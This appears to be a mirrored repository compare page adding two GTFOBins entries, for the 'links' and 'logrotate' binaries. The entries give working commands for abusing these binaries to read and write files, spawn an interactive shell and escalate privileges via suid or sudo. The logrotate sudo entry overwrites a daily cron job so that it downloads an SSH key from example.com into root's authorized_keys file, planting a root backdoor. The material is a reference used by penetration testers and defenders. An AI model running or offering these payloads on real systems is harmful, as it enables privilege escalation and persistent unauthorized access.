mirror/ GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-12 10:36:04 +02:00
Code Issues

Compare commits

base: mirror:a016c294c1a4f2cc06b22a215ded9767f577b1bc
Branches Tags
mirror:master
...
compare: mirror:ded479d4392fdb3e1a604d39517f1233e20bee94
Branches Tags
mirror:master

4 Commits
a016c294c1 ... ded479d439

Author SHA1 Message Date
Joshua Rogers ded479d439
Merge 86292d421e into 97f46f1526 2024-04-24 13:27:17 +08:00
Juampa Rodríguez 97f46f1526
Create links 
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
 2024-04-10 22:46:01 +02:00
Joshua Rogers 86292d421e Fix format. 2023-10-03 15:26:02 +02:00
Joshua Rogers c53615b1ab Add logrotate. 2023-10-03 15:20:47 +02:00
2 changed files with 53 additions and 0 deletions
Show Stats Expand all files Collapse all files

16
_gtfobins/links.md Normal file
View File

@ -0,0 +1,16 @@
---
description: The result is displayed in a TUI interface.
functions:
file-read:
- code: |
LFILE=file_to_read
links "$LFILE"
suid:
- code: |
LFILE=file_to_read
./links "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo links "$LFILE"
---

37
_gtfobins/logrotate.md Normal file
View File

@ -0,0 +1,37 @@
---
functions:
command:
- description: Requires a logrotate policy which uses the `mail` directive. A hash should be used as the final character in the command, as it is run with a few arguments.
code: |
COMMAND='id &> /tmp/output #'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
logrotate -m "$TF" -v -f logrotate.policy
shell:
- description: Requires a logrotate policy which uses the `mail` directive.
code: |
COMMAND='/usr/bin/bash -i #'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
logrotate -m "$TF" -v -f logrotate.policy
file-write:
- description: Creates or overwrites the file with the exact text `logrotate state -- version 2`
code: |
LFILE=file_to_write
logrotate -s "$LFILE" logrotate.policy
- description: Creates or overwrites the file with junk data in combination with arbitrary data.
code: |
LFILE=file_to_write
DATA=data_to_write
logrotate -l "$LFILE" "$DATA"
file-read:
- description: Reads the first 'word'.
code: |
LFILE=file_to_read
logrotate "$LFILE"
sudo:
- description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. Note that this will overwrite `/etc/cron.daily/man-db` with a cronjob.
code: sudo logrotate -l /etc/cron.daily/man-db '2>/dev/null;wget https://example.com/ssh.key -O /root/.ssh/authorized_keys2; exit 0;'
---